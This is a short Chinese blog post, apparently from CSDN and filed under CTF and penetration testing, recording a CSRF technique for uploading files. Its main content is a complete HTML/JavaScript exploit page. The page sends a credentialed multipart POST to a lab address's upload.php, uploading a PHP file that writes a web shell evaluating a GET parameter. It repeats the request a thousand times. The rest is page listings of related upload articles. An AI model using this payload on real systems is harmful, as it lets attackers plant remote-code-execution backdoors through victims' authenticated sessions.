javascript 构造上传文件

最新推荐文章于 2024-06-24 14:36:36 发布
最新推荐文章于 2024-06-24 14:36:36 发布
阅读量521 收藏
点赞数
分类专栏: CTF 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33020901/article/details/79160969
版权
渗透 同时被 2 个专栏收录
59 篇文章 11 订阅
订阅专栏
CTF
20 篇文章 0 订阅
订阅专栏

刚开始 想不通 如何用 csrf 去上传文件,而且 session 也不能伪造

知道 看到 这种方式 ...... 记录一下

<html>
    <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://172.17.0.2/upload.php?"+Math.random(), true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en,zh-CN;q=0.9,zh;q=0.8");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryfJEbEkHoV22zBdaM");
        xhr.withCredentials = "true";
        var body = "------WebKitFormBoundaryfJEbEkHoV22zBdaM\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"1.php\"\r\n" +
          "Content-Type: application/x-php\r\n" +
          "\r\n" +
          "<?php file_put_contents('a.php', '<?php eval($_GET[1]);?>');?>\r\n" +
          "\r\n" +
          "------WebKitFormBoundaryfJEbEkHoV22zBdaM\r\n" +
          "Content-Disposition: form-data; name=\"flid\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "------WebKitFormBoundaryfJEbEkHoV22zBdaM\r\n" +
          "Content-Disposition: form-data; name=\"submit\"\r\n" +
          "\r\n" +
          "上传\r\n" +
          "------WebKitFormBoundaryfJEbEkHoV22zBdaM--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
<script>
	var html = '';
	for(var k=0; k<1000; k++){
		html = html + '<script>submitRequest();<\/script>';
	}
	document.write(html);
</script>
  </body>
</html>


PD_3569
关注
专栏目录
cer本地构造上传
09-26
cer本地构造上传
Javascript DHTML上传文件控件第1/4页
01-19
上章基本上把要交代的基本知识都说了一些,今天终于开始写代码了:D 首先来做一个实例,批量上传的UI控件。以后一般做的示例也是以UI控件为主的。都是封装成Object或者用Function封装成”Class”类。 也许对于单单看...
文件上传-构造表单
qq_46425352的博客
02-27 3811
一些开源项目的测试中,以及知道后端哪个文件接收上传的文件以及路径后,我们就可在前端构造表单上传文件。 例: <form action="upload_file.php" method="post" enctype="multipart/form-data"> <label for="file">文件名:</label> <input type="file" name="file" id="file"><br> <inp...
Java访问上传文件接口,发送POST(MULTIPART_FORM_DATA)请求
最新发布
qq_45155769的博客
06-24 871
由于本人在公司需要实现word文件的PDF预览,但是由于本人技术水平有限,只能写出pdf文件的预览,但是没办法将word文件转换为pdf文件,通过网上转换的方法转换出来的pdf文件也是空白的。经了解公司提供的通用的word转pdf预览的接口(能白嫖就是香)但是公司的接口一般使用是直接在前端上传组件时直接调用就比较方便,但是我的项目在设计之初就是自己后台提供的上传接口将文件保存到minIO中,所以就需要提供一个新接口,从前端的上传组件获取到word文件然后封装一个新的POST请求。
JS 实现文件上传
CHINESE0726的博客
04-10 244
【代码】JS 实现文件上传
手工构造上传消息
weixin_30696427的博客
09-26 77
POST /UploadFile/uploadfile.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0Accept: text/html,application/xhtml+xml,application/xml;q=0....
java实现文件上传
PJ_STAR的博客
03-03 673
第一步 创建maven项目(含web框架),配置并测试tomcat服务器 第2步 引入文件上传所需依赖 <!-- servlet实现文件上传 --> <dependency> <groupId>javax.servlet</groupId> <artifactId>servlet-api</artifactId> <ver
Javascript & DHTML上传文件控件第1/4页
10-30
3. 标签“Javascript DHTML 上传文件”概括了文档的主题,即介绍如何使用JavaScript和DHTML技术实现网页上的文件上传功能。 4. 文档中提到使用“构造函数”来创建一个类的实例,并且这个类具有公共访问信息,例如...
使用Javascript实现跨域上传文件到存储-xiaoqiang1
08-08
标题中提到的是使用JavaScript实现跨域上传文件到存储服务,这通常涉及到Web开发中的前端与后端交互以及跨域资源共享(CORS)的配置。描述中提到了两种文件上传方案,第一种是通过服务器作为中转,而第二种是直接从...
使用WCF REST API和JavaScript上传文件
04-05
本文将深入探讨如何使用WCF REST API与JavaScript相结合来实现文件上传功能。REST(Representational State Transfer)是一种轻量级的Web服务设计模式,它强调通过HTTP协议中的方法(如GET、POST、PUT等)来操作资源...
JavaScript Base64 作为文件上传的实例代码解析
10-20
JavaScript Base64 文件上传详解】 在Web开发中,文件上传是一个常见的需求,尤其是在涉及到图像、文档等资源的交互时。然而,有时我们得到的文件数据是以Base64编码的形式存在,例如通过某些图片裁剪插件处理后...
手把手教菜鸟抓包改包构造上传漏洞拿shel
05-11
手把手教菜鸟抓包改包构造上传漏洞拿shel
聊聊文件上传的设计思路
犬小哈
03-23 206
来源:juejin.cn/post/7308621051524546597???? 欢迎加入小哈的星球,你将获得:专属的项目实战 / Java 学习路线 /一对一提问 / 学习打卡 / 赠书福利全栈前后端分离博客项目 2.0 版本完结啦,演示链接:http://116.62.199.48/,新项目正在酝酿中。全程手摸手,后端 + 前端全栈开发,从 0 到 1 讲解每个功能点开发步骤,1v1 ...
本地文件上传
glgom的博客
03-01 227
文件上传代码: /** * * @Title: uploadFile * @Description: 文件上传 * @param path 文件保存的路径,例:D:/upload/20101010/test.txt * @param fileInputStream * @return boolean * @throws IOException * ...
构造HTTP消息体采用HttpConnection实现文件上传
HMC20071120015的专栏
09-22 1724
自己构造http消息体,用HttpConnection实现文件上传, 后台用的是Sinatra框架搞定服务端,很简洁,几行代码,比起servlet快捷不少 package com.hoot.regx; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.io
手动构造post请求上传文件
爱飞的鱼
06-17 1078
chrome浏览器下post请求,文件上传参数  
PHP代码审计:文件上传构造数组绕过)
qq_22132931的博客
11-07 563
PHP代码审计:文件上传构造数组绕过)
学一点文件上传基础
qq_42404383的博客
09-14 613
文章目录学一点文件上传漏洞基础整体概述:前端验证服务端验证一句话木马本地JS and 远程content-type校验绕过:.htaccess绕过phtml绕过Windows系统特性绕过点绕过空格绕过`::$DATA`绕过Windows流特性绕过:基于文件后缀名的绕过strrchr()str_ireplace()语法技术细节00截断原理二次渲染绕过/图片包含绕过条件竞争漏洞IIS/Nginx/Apache解析漏洞 学一点文件上传漏洞基础 整体概述: 前端验证 一般在网页上写一段javascript脚本,检
构造form表单上传
susuzhe
11-15 2512
写在input的change事件里面if($("#uploaderInput")[0].files[0] != undefined){ //构造form表单上传 var a = new FormData(); a.append("image", $("#uploaderInput")[0].files[0]); //参数ima
JavaScript DHTML 实例教程:批量上传文件控件实现
"这篇教程是关于JavaScript和DHTML的实例编程,主要讲解如何创建一个初级的上传文件控件。教程作者提到,上一章节已经介绍了基础的JavaScript知识,本章节将通过实例开始编写代码,特别是关于批量上传的用户界面控件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值